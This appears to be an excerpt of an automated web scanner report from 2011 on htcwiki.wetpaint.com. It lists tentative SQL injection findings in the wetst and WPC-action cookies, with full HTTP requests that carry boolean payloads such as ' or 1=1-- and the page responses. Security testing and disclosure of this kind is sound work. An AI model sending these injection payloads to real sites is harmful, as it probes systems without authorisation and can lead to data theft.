   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"WIKI_SKIN"
...[SNIP]...

1.7. http://htcwiki.wetpaint.com/page/Smartphone+Blogs+and+Forums [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/Smartphone+Blogs+and+Forums

Issue detail

The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 83263946'%20or%201%3d1--%20 and 83263946'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/Smartphone+Blogs+and+Forums HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:07 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/GnGyRMdMSYE; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=6601282A68E6A62FD4318B3E0947F341; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63010

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>

   <meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" />
   <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people&#039;s identity and status, how to please a secular concept to treat you and your phone,..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"W
...[SNIP]...

Request 2

GET /page/Smartphone+Blogs+and+Forums HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r83263946'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:04:07 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1Tglql35jUC/A+6ceTtRjSe; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:04:07 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 63009

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>Smartphone Blogs and Forums - HTC Smartphone Wiki</title>

   <meta name="keywords" content="Smartphone Blogs and Forums - HTC Smartphone Wiki, BLOGS,forums,smartphones,software,Windows Mobile" />
   <meta name="description" content="Phone now people than essential communication tools, also on behalf of the people&#039;s identity and status, how to please a secular concept to treat you and your phone,..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/
...[SNIP]...

1.8. http://htcwiki.wetpaint.com/page/Smartphone+How-To [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/Smartphone+How-To

Issue detail

The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/Smartphone+How-To HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:05 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDaHC6p64G+mQ; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=9241F2DA15E0BEA02A34D8A0A7517B1B; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:05 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61669

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>Smartphone How-To - HTC Smartphone Wiki</title>

   <meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" />
   <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://sta
...[SNIP]...

Request 2

GET /page/Smartphone+How-To HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r'%20and%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:06 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1RFmQnSxpCUDY8YVP9V3BKl; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:06 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 61668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>Smartphone How-To - HTC Smartphone Wiki</title>

   <meta name="keywords" content="Smartphone How-To - HTC Smartphone Wiki, enable internet radio stations,help,instructions" />
   <meta name="description" content="Add a New Tip Use this section of the wiki to add helpful smartphone instructions, whether they are specific to a particular model or generic to all Windows Mobile..." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI
...[SNIP]...

1.9. http://htcwiki.wetpaint.com/page/Sprint+Touch [wetst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/Sprint+Touch

Issue detail

The wetst cookie appears to be vulnerable to SQL injection attacks. The payloads 46190298'%20or%201%3d1--%20 and 46190298'%20or%201%3d2--%20 were each submitted in the wetst cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d1--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:34 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcPRCQ+El/waa; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=0CC9698F48A8526EEA3937B4F7BB20E6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:34 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 55739

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Sprint Touch - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME
...[SNIP]...

Request 2

GET /page/Sprint+Touch HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action=; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r46190298'%20or%201%3d2--%20; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:03:35 GMT
Server: Apache
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1QkrqgzgwDAcJoGo+pEYs0Y; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:03:35 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 55738

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>HTC Sprint Touch - HTC Smartphone Wiki</title>

   <meta name="keywords" content="HTC Sprint Touch - HTC Smartphone Wiki, Sprint,Sprint Touch,TouchFlo" />
   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.wetpaint.com'.replace(/^(http:\/\/)[^\.]+/,'$1htcwiki'),"WIKI_HOMEPAGE_NAME" : 'HTC Smartphone Wiki',"WIKI_HOMEPAGE_DISPLAY_NAME" : 'Home',"
...[SNIP]...

1.10. http://htcwiki.wetpaint.com/page/reset+password+for+my+cingular+8125 [WPC-action cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://htcwiki.wetpaint.com
Path:   /page/reset+password+for+my+cingular+8125

Issue detail

The WPC-action cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the WPC-action cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /page/reset+password+for+my+cingular+8125 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d1--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:05:04 GMT
Server: Apache
Set-Cookie: wab=joinButton=42; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTvX0KyUR4o0L; Domain=htcwiki.wetpaint.com; Path=/
Set-Cookie: JSESSIONID=7F135B88425F21547100B4AF05FFCEA6; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:04 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42059

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.
...[SNIP]...

Request 2

GET /page/reset+password+for+my+cingular+8125 HTTP/1.1
Host: htcwiki.wetpaint.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpptrk=gpvc=1&ab=0; __utmv=226091973.|1=MemberData=N__anonymous__-__-=1,; JSESSIONID=2B526F4BEE1C7C732218A5DB350FCEA2; __gads=ID=103d0f89e2c18849:T=1296921498:S=ALNI_MZscRnrjNt5QgV8ZsdFzZmCa7-p2A; __utmz=226091973.1296921579.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dwm=1; wptrk=sn=htcwiki&i=1; pvc=1; WPC-action='%20and%201%3d2--%20; apc=tzo=21600000; wpptrk2d=coppa=; __utma=226091973.1084188244.1296921579.1296921579.1296921579.1; __utmc=226091973; wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TlPIMWYDxygwU4VtUkf78r; __utmb=226091973.2.10.1296921579; wab=joinButton=40; __qca=P0-932105070-1296921578417;

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 16:05:04 GMT
Server: Apache
Set-Cookie: wab=joinButton=58; Domain=htcwiki.wetpaint.com; Expires=Sun, 05-Feb-2012 16:05:04 GMT; Path=/
P3P: CP=CAO DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT
Set-Cookie: wetst=4h6HcXB+lup8F+pWn5bUzM2qvr3uWU6slehh7Sv2I1TVp9CNB8VOTpTEoGUg3f3M; Domain=htcwiki.wetpaint.com; Path=/
Cache-Control: max-age=0
Expires: Sat, 05 Feb 2011 16:05:04 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 42058

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

   <title>reset password for my cingular 8125 - HTC Smartphone Wiki</title>

   <meta name="description" content="Official community for HTC products, with tips and tricks for HTC Smartphones, Pocket PC and Android devices." />
       
   <meta name="robots" content="noindex, nofollow" />
   <!-- Render IE8 like IE7 -->
   <meta http-equiv="X-UA-Compatible" content="IE=7" />
   
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/CSSApplication/wpc.css?v=20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/family/f.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/skin/meadowgreen/s.css?20110120041852"; /*]]>*/</style>
   <style type="text/css" media="screen, projection, tv">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/core/c.css?20110120041852"; /*]]>*/</style>    
   
   <style type="text/css" media="print">/*<![CDATA[*/ @import "http://static.wetpaint.com/scripts/wpcss/print/p.css?20110120041852"; /*]]>*/</style>

   <script type="text/javascript">
//<![CDATA[
   var global_inits = {"NAMESPACE" : 'htcwiki',"WIKI_DISPLAY_NAME" : 'HTC Smartphone Wiki',"WIKI_URL" : 'http://htcwiki.wetpaint.com',"WIKI_URI" : '',"WIKI_BASE_URL" : 'http://static.we
